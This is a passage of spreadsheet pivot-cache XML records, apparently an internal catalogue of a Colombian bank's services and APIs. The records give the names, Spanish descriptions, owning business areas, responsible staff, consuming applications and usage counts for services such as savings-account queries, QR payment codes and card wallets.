    <s v="AW0937 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW1156 _x000d__x000a_AW1197 _x000d__x000a_AW0939 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1203001 _x000d__x000a_NU0004001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176 _x000d__x000a_AW1374007 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW1177 _x000d__x000a_AW0922 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW1177 _x000d__x000a_AW0748001 _x000d__x000a_AW0856 _x000d__x000a_SVP _x000d__x000a_AW1128 _x000d__x000a_NU0034001 _x000d__x000a_AW1011 _x000d__x000a_AW1316 _x000d__x000a_AW1218001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_AW1227001 _x000d__x000a_AW0623001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Solicitud"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El objetivo es tener una estrategia en la cual se unifique la atención de los Créditos Hipotecarios y Leasing Habitacional en un solo flujo y poder ofrecer a los clientes y aliados una propuesta unificada y líder en el mercado"/>
    <m/>
    <m/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Solicitudes De Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El objetivo del servicio es gestionar la solicitud de Crédito y Consumo. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0937 _x000d__x000a_AW0718 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Tarjeta En Sistema De Transporte"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionarTarjetaEnSistemaDeTransporte, provee la funcionalidad de activar y bloquear la tarjeta débito cívica asignada a un cliente, en el sistema de transporte Metro"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="Modulo de Administracion de Tarjetas (MAT)_MAT_ISMAT0003"/>
    <s v="MAT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Discrepancia"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite almacenar la aceptación o rechazo de la discrepancia de un producto de Carta de Crédito de Importación o Carta de Crédito de Exportación que tiene el cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Movimiento En Cuenta"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GrabarMovimientoEnCuenta provee una funcionalidad que permite la afectación de cuentas de clientes (Ahorros o Corrientes) para registrar pagos hechos en Murex a los clientes en sus procesos de negociación con Banitsmo."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Murex_MUREX-CORE_AW0434001"/>
    <s v="MX"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Participante"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permite crear participante en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611002 _x000d__x000a_AW0611001 _x000d__x000a_AW0795 _x000d__x000a_Banismo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Participante"/>
    <n v="500"/>
    <s v="No Aplica"/>
    <s v="Permite crear participante en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-29T16:58:13"/>
    <s v="Gwe - Accounts Reconciliation"/>
    <n v="101"/>
    <s v="Gwe - Accounts Reconciliation - Reconciliation Data Query"/>
    <n v="101"/>
    <s v="gwe-accounts-reconciliation-data-query"/>
    <s v="Api que permite  consultar a través de la identificación de un cliente, la información básica de las obligaciones, como lo es el numero de la obligacioó y el tipo de producto, ademas con las obligaciones se puede consultar los abogados que estan gestionando dichas obligaciones"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionConciliacionClientes/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="108"/>
    <n v="33"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-04-25T00:20:43"/>
    <s v="Gwe-Payments"/>
    <n v="106"/>
    <s v="Gwe - Payments - QR Codes Management"/>
    <n v="106"/>
    <s v="gwe-payments-qr-codes-management"/>
    <s v="El api Gwe - Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Todo 1"/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ Ecosistema De Pagos_AW1314001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="18810"/>
    <n v="19842"/>
    <n v="404249"/>
    <n v="597621"/>
    <n v="676318"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Balance Query"/>
    <n v="103"/>
    <s v="gwe-account-alm-balance-query"/>
    <s v="Esta API permite consultar el saldo disponible de una cuenta de Ahorro a La Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2622"/>
    <n v="4318"/>
    <n v="10034"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T14:10:15"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Customer Vinculation"/>
    <n v="104"/>
    <s v="gwe-account-alm-customer-vinculation"/>
    <s v="El API tiene como objetivo crear una cuenta de ahorros de Bancolombia Ahorro a la Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="6606"/>
    <n v="7026"/>
    <n v="190904"/>
    <n v="220353"/>
    <n v="175531"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-25T16:26:47"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Financial Agreement Query"/>
    <n v="100"/>
    <s v="gwe-accounts-alm-financial-agreement"/>
    <s v="El API tiene como objetivo consultar los convenios que existen con Bancolombia y que se puedan usar a través de una cuenta de ahorros de Bancolombia Ahorro a la Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6344"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Transactions"/>
    <n v="103"/>
    <s v="gwe-account-alm-transactions"/>
    <s v="Esta API permite consultar los movimientos de los últimos de los 2 meses de una cuenta de Ahorro a La Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="201067"/>
    <n v="196888"/>
    <n v="3711424"/>
    <n v="5769894"/>
    <n v="7026761"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-25T16:26:47"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Validation Payment Bill"/>
    <n v="100"/>
    <s v="gwe-account-alm-validation-payment-bill"/>
    <s v="El API tiene como objetivo validar el pago a convenios a través de una cuenta de ahorros de Bancolombia Ahorro a La Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2621"/>
    <n v="4316"/>
    <n v="4464"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Withdraw Cash"/>
    <n v="103"/>
    <s v="gwe-account-alm-withdraw-cash"/>
    <s v="Esta API permite realizar el enví­o de un otp para retirar dinero de una cuenta de Bancolombia Ahorro a la Mano en un cajero "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="187473"/>
    <n v="189931"/>
    <n v="6174955"/>
    <n v="7567660"/>
    <n v="9331304"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T14:10:15"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Accounts ALM - Account Reissue"/>
    <n v="103"/>
    <s v="gwe-accounts-alm-account-reissue"/>
    <s v="El API permite realizar el cambio de número de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="784"/>
    <n v="769"/>
    <n v="18118"/>
    <n v="26509"/>
    <n v="33871"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-18T12:02:19"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Accounts ALM - Validation NEQUI"/>
    <n v="102"/>
    <s v="gwe-accounts-alm-validation-nequi"/>
    <s v="El API consiste en validar si un cliente al momento de vincularse a una cuenta de Bancolombia Ahorro a La Mano ya posee una cuenta de ahorros de tramites simplificados en Nequi, ya que por ley, un cliente solo puede poseer una cuenta de ahorros de tramites simplificados. Si al momento de consumir el API de consulta cuenta Nequi este no responde, el cliente debe poder vincularse y posterior operaciones se encargará de realizar las investigaciones y contactar al cliente en caso de que ya posea una cuenta de ahorros de tramites simplificados."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="10589"/>
    <n v="11588"/>
    <n v="320031"/>
    <n v="571540"/>
    <n v="547180"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-05T18:34:16"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Card Verification Code"/>
    <n v="112"/>
    <s v="gwe-cards-card-verification-code"/>
    <s v="Esta API Permite validar información del código CVC de tarjetas"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="196"/>
    <n v="230"/>
    <n v="4394"/>
    <n v="8177"/>
    <n v="14475"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-05T18:34:16"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Cards Preferences"/>
    <n v="113"/>
    <s v="gwe-cards-preferences"/>
    <s v="Permite definir algunas preferencias o configuraciones sobre las tarjetas gestionadas por la Billtera Movil"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="1625"/>
    <n v="1640"/>
    <n v="23994"/>
    <n v="44735"/>
    <n v="57316"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-07-28T21:00:17"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Customer Cards"/>
    <n v="130"/>
    <s v="gwe-cards-customer-cards"/>
    <s v="Permite gestionar las tarjetas de un cliente de billetera móvil en la App Personas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="8417"/>
    <n v="8389"/>
    <n v="131128"/>
    <n v="244548"/>
    <n v="292486"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-01-08T22:11:51"/>
    <s v="Gwe-Customers"/>
    <n v="311"/>
    <s v="Gwe-Customer - Basic Information"/>
    <n v="101"/>
    <s v="gwe-customer-basic-information"/>
    <s v="Te ofrecemos la forma mas fácil y confiable de conocer a tu usuario con información clave y veraz en diferentes niveles de profundidad según las necesidades de tu negocio.  Todo sin necesidad que todos se llenen formularios"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="Visor Interactivo_AW1249 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ Aplicación Transversal de Lealtad - ATL_AW1284 _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MUVERANG_NU0063001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ VisorInteractivo_AW1249 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="5196"/>
    <n v="9501"/>
    <n v="376079"/>
    <n v="759234"/>
    <n v="741750"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-09-20T17:26:08"/>
    <s v="Gwe-Customers"/>
    <n v="311"/>
    <s v="Gwe-Customer - Check Control List"/>
    <n v="100"/>
    <s v="gwe-customer-check-control-list"/>
    <s v="No tiene Descipcion"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="ConsultaListasDeControl/V1.0"/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="Visor Interactivo_AW1249 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ Aplicación Transversal de Lealtad - ATL_AW1284 _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MUVERANG_NU0063001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ VisorInteractivo_AW1249 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="2684"/>
    <n v="2669"/>
    <n v="44177"/>
    <n v="71061"/>
    <n v="80816"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Birth Date Query"/>
    <n v="103"/>
    <s v="gwe-customer-alm-birth-date-query"/>
    <s v="Esta API permite consultar la fecha de nacimiento de un cliente y la fecha de expedición de su documento de identidad. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="403"/>
    <n v="359"/>
    <n v="9090"/>
    <n v="14490"/>
    <n v="21238"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-17T15:59:05"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Change Email"/>
    <n v="104"/>
    <s v="gwe-customer-alm-change-email"/>
    <s v="El API permite realizar el cambio de correo electrónico del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="931"/>
    <n v="801"/>
    <n v="5837"/>
    <n v="9057"/>
    <n v="9398"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Customer Type Query"/>
    <n v="103"/>
    <s v="gwe-customer-alm-customer-type-query"/>
    <s v="Esta API permite consultar si un cliente tiene cuenta Bancolombia, si tiene cuenta de ahorro a la mano, si es cliente exclusivo de ahorro a la mano, si está inscrito en el sistema de alertas y notificaciones y si fue vinculado de forma centralizada. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="14335"/>
    <n v="15679"/>
    <n v="381637"/>
    <n v="567324"/>
    <n v="537299"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Reissue Limit Validation"/>
    <n v="103"/>
    <s v="gwe-customer-alm-reissue-limit-validation"/>
    <s v="Esta API permite validar si un cliente puede realizar una reexpedición de cuenta de Bancolombia Ahorro a la Mano (Cambio de número de teléfono de la cuenta ALM). "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="7611"/>
    <n v="7403"/>
    <n v="164662"/>
    <n v="204313"/>
    <n v="226194"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-06-28T16:23:14"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Validate Customer"/>
    <n v="105"/>
    <s v="gwe-customer-alm-validate-customer"/>
    <s v="El API permite realizar la validación de si un cliente se puede vincular a Ahorro a la Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="52041"/>
    <n v="50097"/>
    <n v="993268"/>
    <n v="1465063"/>
    <n v="1467430"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-25T10:37:39"/>
    <s v="Gwe-Enrollment"/>
    <n v="101"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="101"/>
    <s v="enrollment-users-management"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-04T20:20:40"/>
    <s v="Gwe-Enrollment"/>
    <n v="111"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="111"/>
    <s v="enrollment-user-management"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="APM_AW1097001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NU0037002_VDSORQUESTADORAUTOGESTION_BACK _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="40529"/>
    <n v="48944"/>
    <n v="526150"/>
    <n v="973026"/>
    <n v="1507346"/>
    <x v="6"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-03-19T16:18:50"/>
    <s v="Gwe-Enrollment"/>
    <n v="112"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="112"/>
    <s v="enrollment-user-management"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ EnrolamientoSufiVehiculos_AW1097001 _x000d__x000a_ MonitoreoGWEEnrollment_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ Prueba - sufi - Enrollment - PRD"/>
    <n v="83189"/>
    <n v="86211"/>
    <n v="67132"/>
    <n v="77246"/>
    <n v="106431"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-07T16:44:34"/>
    <s v="Gwe-Fraud"/>
    <n v="103"/>
    <s v="Gwe-Fraud - RSA Monitoring"/>
    <n v="103"/>
    <s v="gwe-fraud-rsa-monitoring"/>
    <s v="El api Gwe-Fraud - RSA Monitoring permite realizar monitoreo antifraude para la autenticación y la transaccionalidad de Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Boton Bancolombia_AW1277001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="47672"/>
    <n v="45731"/>
    <n v="841878"/>
    <n v="1568125"/>
    <n v="1628618"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-22T04:18:42"/>
    <s v="Gwe-JWK Wallet"/>
    <n v="110"/>
    <s v="Gwe-JWK - Wallet"/>
